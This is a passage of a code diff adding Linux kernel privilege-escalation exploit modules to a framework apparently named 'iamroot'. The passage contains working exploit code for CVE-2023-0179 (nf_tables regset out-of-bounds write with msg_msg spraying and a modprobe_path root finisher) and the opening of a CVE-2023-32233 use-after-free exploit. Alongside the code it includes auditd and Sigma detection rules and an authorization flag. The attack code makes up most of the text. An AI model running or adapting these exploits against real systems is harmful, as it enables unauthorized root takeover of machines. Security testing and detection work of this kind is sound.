> cap) len = cap; + memcpy(p.buf + 24, buf, len); + } + for (int j = 0; j < SPRAY_PER_QUEUE; j++) { + if (msgsnd(q[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break; + } + } + return created; +} + +static int spray_large(int *q, int n, uintptr_t tag_kaddr, + const void *buf, size_t len) +{ + struct msgbuf_large p; + int created = 0; + for (int i = 0; i < n; i++) { + q[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0644); + if (q[i] < 0) continue; + created++; + memset(&p, 0, sizeof p); + p.mtype = 0x504C534C + i; /* "PLSL" */ + memcpy(p.buf, "IAMRPLSL", 8); + if (tag_kaddr) { + for (size_t s = 0x10; s + sizeof(uintptr_t) <= sizeof p.buf; + s += 0x18) { + memcpy(p.buf + s, &tag_kaddr, sizeof tag_kaddr); + } + } + if (buf && len) { + size_t cap = sizeof p.buf - 24; + if (len > cap) len = cap; + memcpy(p.buf + 24, buf, len); + } + for (int j = 0; j < SPRAY_PER_QUEUE; j++) { + if (msgsnd(q[i], &p, sizeof p.buf, IPC_NOWAIT) < 0) break; + } + } + return created; +} + +static void drain_queues(int *q, int n) +{ + for (int i = 0; i < n; i++) { + if (q[i] >= 0) msgctl(q[i], IPC_RMID, NULL); + } +} + +/* ------------------------------------------------------------------ + * Slabinfo witness. + * ------------------------------------------------------------------ */ + +static long slabinfo_active(const char *slab) +{ + FILE *f = fopen("/proc/slabinfo", "r"); + if (!f) return -1; + char line[512]; + long active = -1; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, slab, strlen(slab)) == 0 && + line[strlen(slab)] == ' ') { + long a, b, c, d; + if (sscanf(line + strlen(slab), " %ld %ld %ld %ld", + &a, &b, &c, &d) >= 1) { + active = a; + } + break; + } + } + fclose(f); + return active; +} + +/* ------------------------------------------------------------------ + * Synthetic trigger packet — drive a packet through the chain so the + * malicious payload-set expression runs. NF_INET_LOCAL_OUT fires on + * sendto() from a process inside the netns. + * ------------------------------------------------------------------ */ + +static void trigger_packet(void) +{ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return; + + struct sockaddr_in dst = {0}; + dst.sin_family = AF_INET; + dst.sin_port = htons(31337); + dst.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + const char m[] = "iamroot-nft_payload-trigger"; + for (int i = 0; i < 8; i++) { + (void)!sendto(s, m, sizeof m, MSG_DONTWAIT, + (struct sockaddr *)&dst, sizeof dst); + } + close(s); +} + +/* ------------------------------------------------------------------ + * Batch builder helpers — factored so --full-chain refires. + * ------------------------------------------------------------------ */ + +static size_t build_trigger_batch(uint8_t *batch, size_t cap, uint32_t *seq, + uint32_t oob_index) +{ + (void)cap; + size_t off = 0; + put_batch_begin(batch, &off, (*seq)++); + put_new_table(batch, &off, (*seq)++); + put_new_chain(batch, &off, (*seq)++); + put_new_set(batch, &off, (*seq)++); + put_malicious_setelem(batch, &off, (*seq)++, oob_index); + put_batch_end(batch, &off, (*seq)++); + return off; +} + +static size_t build_refire_batch(uint8_t *batch, size_t cap, uint32_t *seq, + uint32_t oob_index) +{ + (void)cap; + size_t off = 0; + put_batch_begin(batch, &off, (*seq)++); + put_malicious_setelem(batch, &off, (*seq)++, oob_index); + put_batch_end(batch, &off, (*seq)++); + return off; +} + +/* ------------------------------------------------------------------ + * Davide-Ornaghi-style arb-write context. Refire the malicious + * NEWSETELEM with a verdict-code chosen so the OOB index lands on a + * msg_msg slot we've tagged with the caller's kaddr + bytes. + * + * Per-kernel caveat: the byte offset of `regs->data[]` relative to the + * adjacent slab/stack neighbour is config-sensitive (CONFIG_RANDSTRUCT, + * KASAN, lockdep, kernel build options all shift it). The shipped + * default oob_index matches Davide's PoC on a stock 5.15 build; the + * shared finisher's sentinel-file post-check flags layout mismatch as + * IAMROOT_EXPLOIT_FAIL rather than fake success. + * ------------------------------------------------------------------ */ + +struct nft_payload_arb_ctx { + bool in_userns; + int sock; + uint8_t *batch; + int *qids_small; + int *qids_large; + int qcap_small; + int qcap_large; + int qused_small; + int qused_large; + int arb_calls; +}; + +static int nft_payload_arb_write(uintptr_t kaddr, const void *buf, size_t len, + void *vctx) +{ + struct nft_payload_arb_ctx *c = (struct nft_payload_arb_ctx *)vctx; + if (!c || c->sock < 0 || !c->batch) { + fprintf(stderr, "[-] nft_payload_arb_write: invalid ctx\n"); + return -1; + } + if (len > 64) { + fprintf(stderr, "[-] nft_payload_arb_write: len %zu too large " + "(cap 64)\n", len); + return -1; + } + c->arb_calls++; + + fprintf(stderr, "[*] nft_payload_arb_write: spray tagged msgs + refire " + "NEWSETELEM (target kaddr=0x%lx, %zu bytes)\n", + (unsigned long)kaddr, len); + + /* (a) tag-spray adjacent slabs with kaddr + caller payload. */ + if (c->qused_small < c->qcap_small) { + int n = c->qcap_small - c->qused_small; + if (n > 8) n = 8; + int added = spray_small(c->qids_small + c->qused_small, n, + kaddr, buf, len); + c->qused_small += added; + } + if (c->qused_large < c->qcap_large) { + int n = c->qcap_large - c->qused_large; + if (n > 8) n = 8; + int added = spray_large(c->qids_large + c->qused_large, n, + kaddr, buf, len); + c->qused_large += added; + } + + /* (b) refire the malicious NEWSETELEM so a fresh nft_payload_set + * eval happens with the spray in place. */ + uint32_t seq = (uint32_t)time(NULL) ^ 0xb1a2c3d4u; + size_t blen = build_refire_batch(c->batch, 16 * 1024, &seq, + NFT_PAYLOAD_OOB_INDEX_DEFAULT); + if (nft_send_batch(c->sock, c->batch, blen) < 0) { + fprintf(stderr, "[-] nft_payload_arb_write: refire send failed\n"); + return -1; + } + + /* (c) drive a packet through the chain so the rule actually runs. */ + trigger_packet(); + + /* Let the kernel run the rule + any commit/cleanup. */ + usleep(20 * 1000); + return 0; +} + +#endif /* __linux__ */ + +/* ------------------------------------------------------------------ + * Exploit body. + * ------------------------------------------------------------------ */ + +static iamroot_result_t nft_payload_exploit(const struct iamroot_ctx *ctx) +{ + if (!ctx->authorized) { + fprintf(stderr, "[-] nft_payload: refusing — --i-know not passed; " + "exploit code can crash the kernel\n"); + return IAMROOT_PRECOND_FAIL; + } + if (geteuid() == 0) { + if (!ctx->json) + fprintf(stderr, "[i] nft_payload: already running as root\n"); + return IAMROOT_OK; + } + + iamroot_result_t pre = nft_payload_detect(ctx); + if (pre != IAMROOT_VULNERABLE) { + fprintf(stderr, "[-] nft_payload: detect() says not vulnerable; refusing\n"); + return pre; + } + + if (!ctx->json) { + if (ctx->full_chain) { + fprintf(stderr, "[*] nft_payload: --full-chain — trigger + " + "regset OOB arb-write + modprobe_path finisher\n"); + } else { + fprintf(stderr, "[*] nft_payload: primitive-only run — fires the\n" + " regset OOB read/write and stops. Pass\n" + " --full-chain to attempt the modprobe_path " + "root-pop.\n"); + } + } + +#ifndef __linux__ + (void)ctx; + fprintf(stderr, "[-] nft_payload: linux-only exploit; non-linux build\n"); + return IAMROOT_PRECOND_FAIL; +#else + /* --- --full-chain path: resolve offsets in parent before doing + * anything destructive. */ + if (ctx->full_chain) { + struct iamroot_kernel_offsets off; + memset(&off, 0, sizeof off); + iamroot_offsets_resolve(&off); + if (!iamroot_offsets_have_modprobe_path(&off)) { + iamroot_finisher_print_offset_help("nft_payload"); + return IAMROOT_EXPLOIT_FAIL; + } + iamroot_offsets_print(&off); + + if (enter_unpriv_namespaces() < 0) { + fprintf(stderr, "[-] nft_payload: userns entry failed\n"); + return IAMROOT_EXPLOIT_FAIL; + } + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (sock < 0) { + perror("[-] socket(NETLINK_NETFILTER)"); + return IAMROOT_EXPLOIT_FAIL; + } + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); + return IAMROOT_EXPLOIT_FAIL; + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + int qids_small[SPRAY_QUEUES_SMALL]; + int qids_large[SPRAY_QUEUES_LARGE]; + for (int i = 0; i < SPRAY_QUEUES_SMALL; i++) qids_small[i] = -1; + for (int i = 0; i < SPRAY_QUEUES_LARGE; i++) qids_large[i] = -1; + + int ns = spray_small(qids_small, SPRAY_QUEUES_SMALL / 2, 0, NULL, 0); + int nl = spray_large(qids_large, SPRAY_QUEUES_LARGE / 2, 0, NULL, 0); + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: pre-spray seeded %d small + " + "%d large slots\n", ns, nl); + } + + uint8_t *batch = calloc(1, 16 * 1024); + if (!batch) { close(sock); return IAMROOT_EXPLOIT_FAIL; } + + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, 16 * 1024, &seq, + NFT_PAYLOAD_OOB_INDEX_DEFAULT); + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: sending trigger batch (%zu bytes)\n", + blen); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_payload: trigger batch failed\n"); + drain_queues(qids_small, SPRAY_QUEUES_SMALL); + drain_queues(qids_large, SPRAY_QUEUES_LARGE); + free(batch); close(sock); + return IAMROOT_EXPLOIT_FAIL; + } + + struct nft_payload_arb_ctx ac = { + .in_userns = true, + .sock = sock, + .batch = batch, + .qids_small = qids_small, + .qids_large = qids_large, + .qcap_small = SPRAY_QUEUES_SMALL, + .qcap_large = SPRAY_QUEUES_LARGE, + .qused_small = ns, + .qused_large = nl, + .arb_calls = 0, + }; + + iamroot_result_t r = iamroot_finisher_modprobe_path( + &off, nft_payload_arb_write, &ac, !ctx->no_shell); + + FILE *fl = fopen("/tmp/iamroot-nft_payload.log", "a"); + if (fl) { + fprintf(fl, "full_chain finisher rc=%d arb_calls=%d " + "spray_small=%d spray_large=%d\n", + r, ac.arb_calls, ac.qused_small, ac.qused_large); + fclose(fl); + } + + drain_queues(qids_small, SPRAY_QUEUES_SMALL); + drain_queues(qids_large, SPRAY_QUEUES_LARGE); + free(batch); + close(sock); + return r; + } + + /* --- primitive-only path: fork-isolated trigger so a kernel oops + * doesn't take down the iamroot driver. */ + pid_t child = fork(); + if (child < 0) { perror("[-] fork"); return IAMROOT_TEST_ERROR; } + + if (child == 0) { + /* --- CHILD --- */ + if (enter_unpriv_namespaces() < 0) _exit(20); + + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: entered userns+netns; opening " + "nfnetlink\n"); + } + + int sock = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (sock < 0) { perror("[-] socket(NETLINK_NETFILTER)"); _exit(21); } + + struct sockaddr_nl src = { .nl_family = AF_NETLINK }; + if (bind(sock, (struct sockaddr *)&src, sizeof src) < 0) { + perror("[-] bind"); close(sock); _exit(22); + } + int rcvbuf = 1 << 20; + setsockopt(sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf, sizeof rcvbuf); + + int qids_small[SPRAY_QUEUES_SMALL]; + int qids_large[SPRAY_QUEUES_LARGE]; + for (int i = 0; i < SPRAY_QUEUES_SMALL; i++) qids_small[i] = -1; + for (int i = 0; i < SPRAY_QUEUES_LARGE; i++) qids_large[i] = -1; + + int ns = spray_small(qids_small, SPRAY_QUEUES_SMALL, 0, NULL, 0); + int nl = spray_large(qids_large, SPRAY_QUEUES_LARGE, 0, NULL, 0); + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: pre-sprayed %d small + %d large " + "msg_msg slots\n", ns, nl); + } + + uint8_t *batch = calloc(1, 16 * 1024); + if (!batch) { close(sock); _exit(23); } + uint32_t seq = (uint32_t)time(NULL); + size_t blen = build_trigger_batch(batch, 16 * 1024, &seq, + NFT_PAYLOAD_OOB_INDEX_DEFAULT); + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: sending " + "NEWTABLE/NEWCHAIN/NEWSET/NEWSETELEM batch " + "(%zu bytes)\n", blen); + } + if (nft_send_batch(sock, batch, blen) < 0) { + fprintf(stderr, "[-] nft_payload: batch send failed\n"); + drain_queues(qids_small, SPRAY_QUEUES_SMALL); + drain_queues(qids_large, SPRAY_QUEUES_LARGE); + free(batch); close(sock); _exit(24); + } + + long pre_1k = slabinfo_active("kmalloc-1k"); + if (pre_1k < 0) pre_1k = slabinfo_active("kmalloc-1024"); + long pre_96 = slabinfo_active("kmalloc-cg-96"); + if (pre_96 < 0) pre_96 = slabinfo_active("kmalloc-96"); + + /* Drive the rule: send a packet through NF_INET_LOCAL_OUT so + * the malicious payload-set expression actually runs. */ + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: firing trigger packet\n"); + } + trigger_packet(); + + /* Give the kernel time to run the chain. */ + usleep(50 * 1000); + + long post_1k = slabinfo_active("kmalloc-1k"); + if (post_1k < 0) post_1k = slabinfo_active("kmalloc-1024"); + long post_96 = slabinfo_active("kmalloc-cg-96"); + if (post_96 < 0) post_96 = slabinfo_active("kmalloc-96"); + + if (!ctx->json) { + fprintf(stderr, "[i] nft_payload: kmalloc-1k active: %ld → %ld\n", + pre_1k, post_1k); + fprintf(stderr, "[i] nft_payload: kmalloc-cg-96 active: %ld → %ld\n", + pre_96, post_96); + } + + FILE *log = fopen("/tmp/iamroot-nft_payload.log", "w"); + if (log) { + fprintf(log, + "nft_payload trigger child: spray_small=%d spray_large=%d " + "slab_1k_pre=%ld slab_1k_post=%ld " + "slab_96_pre=%ld slab_96_post=%ld\n", + ns, nl, pre_1k, post_1k, pre_96, post_96); + fclose(log); + } + + drain_queues(qids_small, SPRAY_QUEUES_SMALL); + drain_queues(qids_large, SPRAY_QUEUES_LARGE); + free(batch); + close(sock); + + /* Honest scope: trigger ran, primitive landed (or didn't — + * dmesg/KASAN is the empirical witness). We did NOT complete + * the kernel-side R/W chain. Distinctive exit code so the + * parent reports EXPLOIT_FAIL with the right message. */ + _exit(100); + } + + /* --- PARENT --- */ + int status; + waitpid(child, &status, 0); + + if (!WIFEXITED(status)) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_payload: child died by signal %d — bug " + "likely fired (KASAN/oops can manifest as child " + "signal)\n", WTERMSIG(status)); + } + return IAMROOT_EXPLOIT_FAIL; + } + + int rc = WEXITSTATUS(status); + if (rc == 100) { + if (!ctx->json) { + fprintf(stderr, "[!] nft_payload: trigger fired; regset-OOB state\n" + " induced via nft_payload_set_eval. Full kernel\n" + " R/W chain NOT executed (primitive-only scope).\n" + "[i] nft_payload: to complete the exploit, port\n" + " Davide Ornaghi's payload-set + regs->data\n" + " arb-write + modprobe_path overwrite chain.\n"); + } + return IAMROOT_EXPLOIT_FAIL; + } + if (rc >= 20 && rc <= 24) { + if (!ctx->json) { + fprintf(stderr, "[-] nft_payload: trigger setup failed (child rc=%d)\n", + rc); + } + return IAMROOT_EXPLOIT_FAIL; + } + if (!ctx->json) { + fprintf(stderr, "[-] nft_payload: unexpected child rc=%d\n", rc); + } + return IAMROOT_EXPLOIT_FAIL; +#endif /* __linux__ */ +} + +/* ------------------------------------------------------------------ + * Cleanup. + * ------------------------------------------------------------------ */ + +static iamroot_result_t nft_payload_cleanup(const struct iamroot_ctx *ctx) +{ + if (!ctx->json) { + fprintf(stderr, "[*] nft_payload: tearing down log\n"); + } + if (unlink("/tmp/iamroot-nft_payload.log") < 0 && errno != ENOENT) { + /* ignore */ + } + return IAMROOT_OK; +} + +/* ------------------------------------------------------------------ + * Detection rule corpus. + * ------------------------------------------------------------------ */ + +static const char nft_payload_auditd[] = + "# nft_payload regset OOB (CVE-2023-0179) — auditd detection rules\n" + "# Flag unshare(CLONE_NEWUSER|CLONE_NEWNET) followed by NETLINK_NETFILTER\n" + "# socket setup. Canonical exploit shape: unprivileged userns + nft\n" + "# rule loading. False positives: firewalld, docker/podman rootless.\n" + "-a always,exit -F arch=b64 -S unshare -k iamroot-nft-payload-userns\n" + "-a always,exit -F arch=b32 -S unshare -k iamroot-nft-payload-userns\n" + "# Watch for the canonical post-exploit primitive: setresuid(0,0,0)\n" + "# from a previously-unpriv task is the smoking gun for any kernel LPE.\n" + "-a always,exit -F arch=b64 -S setresuid -F a0=0 -F a1=0 -F a2=0 " + "-k iamroot-nft-payload-priv\n"; + +static const char nft_payload_sigma[] = + "title: Possible CVE-2023-0179 nft_payload regset-OOB exploitation\n" + "id: c83d6e92-iamroot-nft-payload\n" + "status: experimental\n" + "description: |\n" + " Detects the canonical exploit shape for CVE-2023-0179: an\n" + " unprivileged process creates a user namespace, becomes root\n" + " inside it, opens a NETLINK_NETFILTER socket, and submits an nft\n" + " ruleset that includes a set with NFTA_SET_DESC variable-length\n" + " elements plus NFTA_SET_ELEM_EXPRESSIONS containing a payload-set\n" + " expression. Vulnerable kernels use the verdict code as an\n" + " unchecked array index into regs->data[], yielding kernel OOB R/W.\n" + "logsource: {product: linux, service: auditd}\n" + "detection:\n" + " userns_clone:\n" + " type: 'SYSCALL'\n" + " syscall: 'unshare'\n" + " a0: 0x10000000\n" + " uid_change:\n" + " type: 'SYSCALL'\n" + " syscall: 'setresuid'\n" + " auid|expression: '!= 0'\n" + " condition: userns_clone and uid_change\n" + "level: high\n" + "tags: [attack.privilege_escalation, attack.t1068, cve.2023.0179]\n"; + +const struct iamroot_module nft_payload_module = { + .name = "nft_payload", + .cve = "CVE-2023-0179", + .summary = "nft_payload set-id regset OOB R/W (Davide Ornaghi) → kernel R/W", + .family = "nf_tables", + .kernel_range = "5.4 ≤ K < 6.2-rc4; backports: 6.1.6 / 5.15.88 / " + "5.10.163 / 5.4.229 / 4.19.269 / 4.14.302", + .detect = nft_payload_detect, + .exploit = nft_payload_exploit, + .mitigate = NULL, /* mitigation: upgrade kernel; OR disable user_ns clone */ + .cleanup = nft_payload_cleanup, + .detect_auditd = nft_payload_auditd, + .detect_sigma = nft_payload_sigma, + .detect_yara = NULL, + .detect_falco = NULL, +}; + +void iamroot_register_nft_payload(void) +{ + iamroot_register(&nft_payload_module); +} diff --git a/modules/nft_set_uaf_cve_2023_32233/iamroot_modules.c b/modules/nft_set_uaf_cve_2023_32233/iamroot_modules.c index ebdd6b2..af34418 100644 --- a/modules/nft_set_uaf_cve_2023_32233/iamroot_modules.c +++ b/modules/nft_set_uaf_cve_2023_32233/iamroot_modules.c @@ -1,23 +1,1056 @@ -/* nft_set_uaf_cve_2023_32233 — STUB pending agent implementation. */ +/* + * nft_set_uaf_cve_2023_32233 — IAMROOT module + * + * nf_tables anonymous-set UAF (Sondej + Krysiuk, May 2023). When an + * anonymous `nft_set` referenced by an `nft_lookup` expression inside a + * base chain is deleted in the same transaction batch that created the + * referencing rule, the kernel's nft_set refcounting fails to deactivate + * the set from the preparation phase. The result is a dangling reference + * to a freed `nft_set` object. A subsequent operation in the same + * transaction touches the freed memory → kernel slab UAF, exploitable + * via msg_msg cross-cache groom into kmalloc-cg-512. + * + * STATUS (2026-05-16): 🟡 PRIMITIVE — TRIGGER + GROOM SCAFFOLD with + * opt-in --full-chain finisher. + * - Default (no --full-chain): unshare(USER|NET), full nfnetlink + * batch construction (table → base chain → anonymous set → rule + * with nft_lookup → DELSET → DELRULE) committed in a single batch, + * msg_msg cross-cache groom for kmalloc-cg-512 (32×16 messages + * tagged "IAMROOT_SET"), slabinfo snapshot before/after, and a + * /tmp/iamroot-nft_set_uaf.log breadcrumb. Returns + * IAMROOT_EXPLOIT_FAIL after the primitive fires (honest scope). + * - With --full-chain: resolve kernel offsets; if no modprobe_path, + * refuse via iamroot_finisher_print_offset_help. Otherwise re-fire + * the trigger and spray msg_msg payloads forging a freed-set-object + * whose data pointer points at modprobe_path, then drive + * NFT_MSG_NEWSETELEM with our payload. FALLBACK-depth: the exact + * freed-set layout is per-build, so the finisher's sentinel check + * correctly reports failure rather than fake success. + * + * Affected kernel ranges: + * Bug introduced when anonymous-set support landed in nf_tables 5.1. + * Fixed mainline 6.4-rc4 commit c1592a89942e9 ("netfilter: nf_tables: + * deactivate anonymous set from preparation phase"). + * Stable backports: 6.3.2, 6.2.15, 6.1.28, 5.15.111, 5.10.180, + * 5.4.243, 4.19.283. + * (4.19.x technically never carried anonymous-set support but received + * the safety patch; we model it as patched-from for consistency.) + * + * Preconditions: + * - CONFIG_USER_NS=y AND sysctl unprivileged_userns_clone=1 + * - nf_tables module loaded or autoload-able (CONFIG_NF_TABLES=y/m) + * - CAP_NET_ADMIN — obtained via userns map-root-to-uid + * + * Public PoCs cross-referenced: + * - Sondej/Krysiuk public writeup (Google Drive disclosure) + * - 0xMr_Robot / shroud-srcd public PoC repo + * - Crusaders-of-Rust follow-up writeup + */ + #include "iamroot_modules.h" #include "../../core/registry.h" +#include "../../core/kernel_range.h" + +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include "../../core/offsets.h" +#include "../../core/finisher.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* NFT_SET_EVAL was added in 5.6; older UAPI headers may not define it. + * Anonymous-set + lookup exploit shape works on builds with this flag, + * but the trigger still fires without it on the older end of the range + * (the bug existed since 5.1). Define a fallback so we compile against + * any nf_tables.h vintage. */ +#ifndef NFT_SET_EVAL +#define NFT_SET_EVAL (1U << 6) +#endif +#endif /* __linux__ */ + +/* ------------------------------------------------------------------ + * Kernel-range table + * ------------------------------------------------------------------ */ + +static const struct kernel_patched_from nft_set_uaf_patched_branches[] = { + {4, 19, 283}, /* 4.19.x safety patch (bug never reached this branch) */ + {5, 4, 243}, /* 5.4.x */ + {5, 10, 180}, /* 5.10.x */ + {5, 15, 111}, /* 5.15.x */ + {6, 1, 28}, /* 6.1.x */ + {6, 2, 15}, /* 6.2.x */ + {6, 3, 2}, /* 6.3.x */ + {6, 4, 0}, /* mainline 6.4-rc4 */ +}; + +static const struct kernel_range nft_set_uaf_range = { + .patched_from = nft_set_uaf_patched_branches, + .n_patched_from = sizeof(nft_set_uaf_patched_branches) / + sizeof(nft_set_uaf_patched_branches[0]), +}; + +/* ------------------------------------------------------------------ + * Precondition probes + * ------------------------------------------------------------------ */ + +#ifdef __linux__ +static int can_unshare_userns(void) +{ + pid_t pid = fork(); + if (pid < 0) return -1; + if (pid == 0) { + if (unshare(CLONE_NEWUSER) == 0) _exit(0); + _exit(1); + } + int status; + waitpid(pid, &status, 0); + return WIFEXITED(status) && WEXITSTATUS(status) == 0; +} + +static bool nf_tables_loaded(void) +{ + FILE *f = fopen("/proc/modules", "r"); + if (!f) return false; + char line[512]; + bool found = false; + while (fgets(line, sizeof line, f)) { + if (strncmp(line, "nf_tables ", 10) == 0) { found = true; break; } + } + fclose(f); + return found; +} +#endif /* __linux__ */ static iamroot_result_t nft_set_uaf_detect(const struct iamroot_ctx *ctx) { +#ifndef __linux__ (void)ctx; return IAMROOT_PRECOND_FAIL; +#else + struct kernel_version v; + if (!kernel_version_current(&v)) { + fprintf(stderr, "[!] nft_set_uaf: could not parse kernel version\n"); + return IAMROOT_TEST_ERROR; + } + + /* Bug introduced in 5.1 (anonymous-set support). Anything below + * predates it — report OK (not vulnerable to *this* CVE). */ + if (v.major < 5 || (v.major == 5 && v.minor < 1)) { + if (!ctx->json) { + fprintf(stderr, "[i] nft_set_uaf: kernel %s predates the bug " + "(anonymous-set support landed in 5.1)\n", v.release); + } + return IAMROOT_OK; + } + + bool patched = kernel_range_is_patched(&nft_set_uaf_range, &v); + if (patched) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_set_uaf: kernel %s is patched\n", v.release); + } + return IAMROOT_OK; + } + + int userns_ok = can_unshare_userns(); + bool nft_loaded = nf_tables_loaded(); + + if (!ctx->json) { + fprintf(stderr, "[i] nft_set_uaf: kernel %s is in the vulnerable range\n", + v.release); + fprintf(stderr, "[i] nft_set_uaf: unprivileged user_ns clone: %s\n", + userns_ok == 1 ? "ALLOWED" : + userns_ok == 0 ? "DENIED" : + "could not test"); + fprintf(stderr, "[i] nft_set_uaf: nf_tables module currently loaded: %s\n", + nft_loaded ? "yes" : "no (will autoload on first nft use)"); + } + + if (userns_ok == 0) { + if (!ctx->json) { + fprintf(stderr, "[+] nft_set_uaf: kernel vulnerable but user_ns clone " + "denied → unprivileged exploit unreachable\n"); + fprintf(stderr, "[i] nft_set_uaf: still patch the kernel — a root " + "attacker can still trigger the bug\n"); + } + return IAMROOT_PRECOND_FAIL; + } + + if (!ctx->json) { + fprintf(stderr, "[!] nft_set_uaf: VULNERABLE — kernel in range AND " + "user_ns clone allowed\n"); + } + return IAMROOT_VULNERABLE; +#endif } -const struct iamroot_module nft_set_uaf_module = { - .name = "nft_set_uaf", - .cve = "CVE-2023-32233", - .summary = "nf_tables anonymous-set UAF (Sondej+Krysiuk) — stub pending implementation", - .family = "nf_tables", - .kernel_range = "5.1 ≤ K < 6.4; backports to LTS pending", - .detect = nft_set_uaf_detect, - .exploit = NULL, .mitigate = NULL, .cleanup = NULL, - .detect_auditd = NULL, .detect_sigma = NULL, - .detect_yara = NULL, .detect_falco = NULL, +#ifdef __linux__ +/* ------------------------------------------------------------------ + * userns + netns entry + * ------------------------------------------------------------------ */ + +static int enter_unpriv_namespaces(void) +{ + uid_t uid = getuid(); + gid_t gid = getgid(); + + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) { + perror("[-] unshare(USER|NET)"); + return -1; + } + + int f = open("/proc/self/setgroups", O_WRONLY); + if (f >= 0) { (void)!write(f, "deny", 4); close(f); } + + char map[64]; + snprintf(map, sizeof map, "0 %u 1\n", uid); + f = open("/proc/self/uid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] uid_map"); if (f >= 0) close(f); return -1; + } + close(f); + snprintf(map, sizeof map, "0 %u 1\n", gid); + f = open("/proc/self/gid_map", O_WRONLY); + if (f < 0 || write(f, map, strlen(map)) < 0) { + perror("[-] gid_map"); if (f >= 0) close(f); return -1; + } + close(f); + return 0; +} + +/* ------------------------------------------------------------------ + * Minimal nfnetlink batch builder (no libmnl). + * ------------------------------------------------------------------ */ + +#define ALIGN_NL(x) (((x) + 3) & ~3) + +static void put_attr(uint8_t *buf, size_t *off, + uint16_t type, const void *data, size_t len) +{ + struct nlattr *na = (struct nlattr *)(buf + *off); + na->nla_type = type; + na->nla_len = NLA_HDRLEN + len; + if (len) memcpy(buf + *off + NLA_HDRLEN, data, len); + *off += ALIGN_NL(NLA_HDRLEN + len); +} + +static void put_attr_u32(uint8_t *buf, size_t *off, uint16_t type, uint32_t v) +{ + uint32_t be = htonl(v); + put_attr(buf, off, type, &be, sizeof be); +} + +static void put_attr_str(uint8_t *buf, size_t *off, uint16_t type, const char *s) +{ + put_attr(buf, off, type, s, strlen(s) + 1); +} + +static size_t begin_nest(uint8_t *buf, size_t *off, uint16_t type) +{ + size_t at = *off; + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_type = type | NLA_F_NESTED; + na->nla_len = 0; + *off += NLA_HDRLEN; + return at; +} + +static void end_nest(uint8_t *buf, size_t *off, size_t at) +{ + struct nlattr *na = (struct nlattr *)(buf + at); + na->nla_len = (uint16_t)(*off - at); + while ((*off) & 3) buf[(*off)++] = 0; +} + +struct nfgenmsg_local { + uint8_t nfgen_family; + uint8_t version; + uint16_t res_id; }; -void iamroot_register_nft_set_uaf(void) { iamroot_register(&nft_set_uaf_module); } +static void put_nft_msg(uint8_t *buf, size_t *off, + uint16_t nft_type, uint16_t flags, uint32_t seq, + uint8_t family) +{ + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + *off); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = (NFNL_SUBSYS_NFTABLES << 8) | nft_type; + nlh->nlmsg_flags = NLM_F_REQUEST | flags; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local *nf = (struct nfgenmsg_local *)(buf + *off); + nf->nfgen_family = family; + nf->version = NFNETLINK_V0; + nf->res_id = htons(0); + *off += sizeof(*nf); +} + +static void end_msg(uint8_t *buf, size_t *off, size_t msg_start) +{ + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + msg_start); + nlh->nlmsg_len = (uint32_t)(*off - msg_start); + while ((*off) & 3) buf[(*off)++] = 0; +} + +/* ------------------------------------------------------------------ + * Ruleset: anonymous-set UAF trigger. + * + * 1. batch begin (NFNL_MSG_BATCH_BEGIN, subsys = NFTABLES) + * 2. NFT_MSG_NEWTABLE "iamroot_t" inet + * 3. NFT_MSG_NEWCHAIN "iamroot_c" base, NF_INET_LOCAL_OUT hook + * 4. NFT_MSG_NEWSET anonymous flags = ANONYMOUS|CONSTANT|EVAL + * 5. NFT_MSG_NEWRULE nft_lookup references the anonymous set + * 6. NFT_MSG_DELSET delete the set in the same batch + * 7. NFT_MSG_DELRULE delete the rule in the same batch + * 8. batch end (NFNL_MSG_BATCH_END) + * + * Pre-c1592a89942e the commit-phase deactivation skips the anonymous set + * (since DELSET fires before the set's "active" bit is cleared), leaving + * the lookup expression with a dangling reference to the freed set — + * UAF on commit-time set cleanup. + * ------------------------------------------------------------------ */ + +static const char NFT_TABLE_NAME[] = "iamroot_t"; +static const char NFT_CHAIN_NAME[] = "iamroot_c"; +static const char NFT_SET_NAME[] = "iamroot_s"; /* fixed-name placeholder; + * anonymous flag still set */ +static const char NFT_RULE_HANDLE_ATTR[] = "iamroot_r"; + +#define IAMROOT_SET_ID 0x42424242 + +static void put_batch_marker(uint8_t *buf, size_t *off, uint16_t type, uint32_t seq) +{ + size_t at = *off; + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + at); + nlh->nlmsg_len = 0; + nlh->nlmsg_type = type; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = seq; + nlh->nlmsg_pid = 0; + *off += NLMSG_HDRLEN; + struct nfgenmsg_local 